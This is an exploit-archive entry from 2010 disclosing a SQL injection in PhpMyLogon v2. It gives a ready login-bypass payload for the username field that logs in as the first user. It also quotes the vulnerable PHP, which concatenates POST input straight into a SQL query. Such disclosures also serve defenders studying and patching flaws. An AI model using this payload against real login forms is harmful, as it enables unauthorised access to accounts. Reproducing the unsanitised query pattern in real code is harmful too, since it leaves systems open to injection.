PhpMyLogon v2 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PhpMyLogon v2 SQL Injection Vulnerability
# Published : 2010-03-14
# Author : Blake
# Previous Title : deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability
# Next Title : Joomla Component com_sbsfile Local File Inclusion

# Exploit Title: PhpMyLogon SQL Injection
# Date: March 14, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
# Version: 2
# Tested on: Windows XP SP3


Proof of Concept:
Enter the following for the username to login as the first user:
blake'  or '1'='1' #
and anything for the password.

Vulnerable Code:
        if(isset($_POST['submit'])) {
            if($_POST['username'] != "" AND $_POST['password'] != "") {
                // Check submitted data with data in database
                $sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";
                $query = mysql_query($sql);